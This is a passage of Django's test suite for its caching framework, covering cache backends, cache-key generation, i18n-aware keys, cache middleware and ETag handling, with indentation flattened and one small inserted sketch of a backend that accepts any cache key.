router.routers = [DBCacheRouter()]
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable',
database='default',
verbosity=0, interactive=False)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create the table
# 3: create the index
with self.assertNumQueries(3, using='other'):
management.call_command('createcachetable',
database='other',
verbosity=0, interactive=False)
finally:
router.routers = old_routers
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super(LocMemCacheTests, self).setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Check that multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertEqual(caches['other'].get('value'), None)
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
memcached_params = {}
for _cache_params in settings.CACHES.values():
if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'):
memcached_params = _cache_params
@unittest.skipUnless(memcached_params, "memcached not available")
@override_settings(CACHES=caches_setting_for_tests(base=memcached_params))
class MemcachedCacheTests(BaseCacheTests, TestCase):
def test_invalid_keys(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
self.assertRaises(Exception, cache.set, 'key with spaces', 'value')
# memcached limits key length to 250
self.assertRaises(Exception, cache.set, 'a' * 251, 'value')
# Explicitly display a skipped test if no configured cache uses MemcachedCache
@unittest.skipUnless(
memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache',
"cache with python-memcached library not available")
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key, cache in settings.CACHES.items():
if cache['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache':
self.assertEqual(caches[cache_key]._cache.pickleProtocol,
pickle.HIGHEST_PROTOCOL)
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super(FileBasedCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
def tearDown(self):
shutil.rmtree(self.dirname)
super(FileBasedCacheTests, self).tearDown()
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
self.assertTrue(os.path.exists(self.dirname))
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(TestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
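# A hedged sketch (an assumption, not copied from this project) of what a
# backend like the 'cache.liberal_backend.CacheClass' used above could look
# like: a no-op validate_key() mixed into the builtin locmem backend, so keys
# with spaces or more than 250 characters are accepted without warnings.
from django.core.cache.backends.locmem import LocMemCache

class _LiberalKeyValidationMixin(object):
    def validate_key(self, key):
        # Accept any key; the builtin implementation would warn on long or
        # whitespace-containing keys.
        pass

class _LiberalCacheClass(_LiberalKeyValidationMixin, LocMemCache):
    pass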
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class GetCacheTests(IgnorePendingDeprecationWarningsMixin, TestCase):
def test_simple(self):
from django.core.cache import caches, DEFAULT_CACHE_ALIAS, get_cache
self.assertIsInstance(
caches[DEFAULT_CACHE_ALIAS],
get_cache('default').__class__
)
cache = get_cache(
'django.core.cache.backends.dummy.DummyCache',
**{'TIMEOUT': 120}
)
self.assertEqual(cache.default_timeout, 120)
self.assertRaises(InvalidCacheBackendError, get_cache, 'does_not_exist')
def test_close(self):
from django.core import signals
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
def test_close_deprecated(self):
from django.core.cache import get_cache
from django.core import signals
cache = get_cache('cache.closeable_cache.CacheClass')
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class CacheUtils(TestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertEqual(get_cache_key(request), None)
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertEqual(get_cache_key(request), None)
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertTrue(get_cache_key(request1) != get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, set(['private'])),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, set(['private'])),
('private', {'public': True}, set(['public'])),
('public', {'public': True}, set(['public'])),
('public', {'private': True}, set(['private'])),
('must-revalidate,max-age=60,private', {'public': True}, set(['must-revalidate', 'max-age=60', 'public'])),
('must-revalidate,max-age=60,public', {'private': True}, set(['must-revalidate', 'max-age=60', 'private'])),
('must-revalidate,max-age=60', {'public': True}, set(['must-revalidate', 'max-age=60', 'public'])),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertNotEqual(get_cache_data, None)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertNotEqual(get_cache_data, None)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=(
('en', 'English'),
('es', 'Spanish'),
),
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Regression test for #17476
class CustomTzName(timezone.UTC):
name = ''
def tzname(self, dt):
return self.name
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName()):
CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertEqual(get_cache_data, None)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertNotEqual(get_cache_data, None)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data, None)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# Check that we can recover the cache
self.assertNotEqual(get_cache_data, None)
self.assertEqual(get_cache_data.content, en_message.encode())
# Check that we use etags
self.assertTrue(get_cache_data.has_header('ETag'))
# Check that we can disable etags
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# This test passes on Python < 3.3 even without the corresponding code
# in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
# fails (http://bugs.python.org/issue14288). LocMemCache silently
# swallows the exception and doesn't store the response in cache.
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHE_MIDDLEWARE_ANONYMOUS_ONLY=False,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(IgnoreDeprecationWarningsMixin, TestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache_anonymous_only, False)
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
self.assertEqual(as_view_decorator.cache_alias, 'default') # Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_anonymous_only, False)
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_anonymous_only=True, cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
self.assertEqual(as_view_decorator_with_custom.cache_anonymous_only, True)
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertEqual(result, None)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertNotEqual(result, None)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertEqual(result, None)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertNotEqual(result, None)
self.assertEqual(result.content, b'Hello World 1')
@override_settings(CACHE_MIDDLEWARE_ANONYMOUS_ONLY=True)
def test_cache_middleware_anonymous_only_wont_cause_session_access(self):
""" The cache middleware shouldn't cause a session access due to
CACHE_MIDDLEWARE_ANONYMOUS_ONLY if nothing else has accessed the
session. Refs 13283 """
from django.contrib.sessions.middleware import SessionMiddleware
from django.contrib.auth.middleware import AuthenticationMiddleware
middleware = CacheMiddleware()
session_middleware = SessionMiddleware()
auth_middleware = AuthenticationMiddleware()
request = self.factory.get('/view_anon/')
# Put the request through the request middleware
session_middleware.process_request(request)
auth_middleware.process_request(request)
result = middleware.process_request(request)
self.assertEqual(result, None)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
session_middleware.process_response(request, response)
response = middleware.process_response(request, response)
self.assertEqual(request.session.accessed, False)
@override_settings(CACHE_MIDDLEWARE_ANONYMOUS_ONLY=True)
def test_cache_middleware_anonymous_only_with_cache_page(self):
"""CACHE_MIDDLEWARE_ANONYMOUS_ONLY should still be effective when used
with the cache_page decorator: the response to a request from an
authenticated user should not be cached."""
request = self.factory.get('/view_anon/')
class MockAuthenticatedUser(object):
def is_authenticated(self):
return True
class MockAccessedSession(object):
accessed = True
request.user = MockAuthenticatedUser()
request.session = MockAccessedSession()
response = cache_page(60)(hello_world_view)(request, '1')
self.assertFalse("Cache-Control" in response)
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(TestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the Etag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = TemplateResponse(HttpResponse(), Template("This is a test"))
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = TemplateResponse(HttpResponse(), Template("This is a test"))
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertEqual(get_cache_key(request), None)
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = TemplateResponse(HttpResponse(), Template("This is a test"))
# Expect None if no headers have been set yet.
self.assertEqual(get_cache_key(request), None)
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
response = TemplateResponse(HttpResponse(), Template("This is a test"))
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
response = TemplateResponse(HttpResponse(), Template("This is a test"))
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
class TestEtagWithAdmin(TestCase):
# See https://code.djangoproject.com/ticket/16003
urls = "admin_views.urls"
def test_admin(self):
with self.settings(USE_ETAGS=False):
response = self.client.get('/test_admin/admin/')
self.assertEqual(response.status_code, 302)
self.assertFalse(response.has_header('ETag'))
with self.settings(USE_ETAGS=True):
response = self.client.get('/test_admin/admin/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(TestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key,
'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key,
